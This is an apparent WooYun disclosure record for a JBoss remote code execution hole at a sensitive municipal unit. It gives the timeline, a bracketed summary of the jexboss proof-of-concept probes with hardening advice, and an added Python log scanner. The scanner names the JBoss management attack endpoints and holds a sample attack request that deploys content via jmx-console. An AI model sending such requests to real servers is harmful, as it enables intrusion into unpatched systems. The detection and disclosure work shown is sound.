WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-05-07: Details sent to the vendor, awaiting vendor handling
2015-05-07: Vendor has confirmed; details disclosed to the vendor only
2015-05-17: Details disclosed to core white hats and relevant domain experts
2015-05-27: Details disclosed to ordinary white hats
2015-06-06: Details disclosed to intern white hats
2015-06-21: Details disclosed to the public

JBoss remote code execution vulnerability at a certain city's sensitive-unit Network Report* Center
[The proof-of-concept section of this report survives only as a redacted and garbled copy of the jexboss script ("JBoss verify and EXploitation tool", https://github.com/joaomatosf/jexboss, by João Filho Matos Figueiredo); the target hosts are masked in the original. What is still recoverable: the script probes the target's /jmx-console/HtmlAdaptor, /web-console/Invoker and /invoker/JMXInvokerServlet endpoints, reports "[ VULNERABLE ]" when they answer 200, and its output ends with the following recommendations: remove web-console, http-invoker, jmx-console, jmx-invoker-adaptor and admin-console from the JBoss "deploy" directories, and expose the server only through a reverse proxy (e.g. nginx). References cited by the script: https://developer.jboss.org/wiki/SecureTheJmxConsole and https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf. Questions and suggestions about the tool go to its GitHub page.]
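As an added, defender-side example (not part of the original report, nor code from the jexboss tool it used): a small Python check that flags web-server access-log entries touching the JBoss management endpoints the PoC probed (jmx-console HtmlAdaptor, web-console Invoker, invoker/JMXInvokerServlet, admin-console). The log lines are constructed, and the severity tiers are my own assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" access-log format: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Endpoints probed by the report's PoC and named in the "remove from deploy" advice.
CONSOLE_PATHS = ("/jmx-console", "/web-console", "/admin-console")
INVOKER_PATHS = ("/invoker/JMXInvokerServlet", "/web-console/Invoker")

def classify(line):
    """Return (severity, reason, record) for a JBoss-management hit, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a combined-format line; ignore
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    path, query = parts.path, parse_qs(parts.query)
    action = query.get("action", [""])[0]
    # HtmlAdaptor invokeOp/invokeOpByName drives MBean operations such as
    # DeploymentFileRepository.store, i.e. deployment of attacker content.
    if path.startswith("/jmx-console/HtmlAdaptor") and action in ("invokeOp", "invokeOpByName"):
        return ("high", "MBean operation invoked via jmx-console HtmlAdaptor", rec)
    # A POST to an invoker servlet carries a serialized Java object.
    if rec["method"] == "POST" and any(path.startswith(p) for p in INVOKER_PATHS):
        return ("high", "POST to JBoss invoker servlet", rec)
    # Plain GET/HEAD of a console path: reconnaissance; worse if it answered 200.
    if any(path.startswith(p) for p in CONSOLE_PATHS + INVOKER_PATHS):
        sev = "medium" if rec["status"] == "200" else "low"
        return (sev, "probe of JBoss management endpoint", rec)
    return None

def scan(lines):
    """Run classify() over an iterable of log lines and keep the hits."""
    return [h for h in (classify(l) for l in lines) if h]

# Constructed sample log (addresses are documentation ranges, not real hosts).
SAMPLE_LOG = """\
203.0.113.5 - - [07/May/2015:10:01:02 +0800] "HEAD /jmx-console/ HTTP/1.1" 200 -
203.0.113.5 - - [07/May/2015:10:01:03 +0800] "GET /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store HTTP/1.1" 200 1532
203.0.113.5 - - [07/May/2015:10:01:09 +0800] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 877
198.51.100.9 - - [07/May/2015:10:02:00 +0800] "GET /index.html HTTP/1.1" 200 4211
198.51.100.9 - - [07/May/2015:10:02:05 +0800] "GET /web-console/ HTTP/1.1" 404 210
"""

if __name__ == "__main__":
    for sev, why, rec in scan(SAMPLE_LOG.splitlines()):
        print(f"{sev:6} {rec['ip']:14} {rec['method']} {rec['target'][:60]} -> {why}")
```

On a hardened server (consoles and invokers removed, only a reverse proxy exposed) every one of these paths should answer 404, so a "medium" or "high" hit is itself evidence that the mitigation was not applied.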
Severity: High
Vulnerability Rank: 10
Confirmation time: 2015-05-07 16:22
Verified and confirmed the described issue; notified them to fix it.
None for now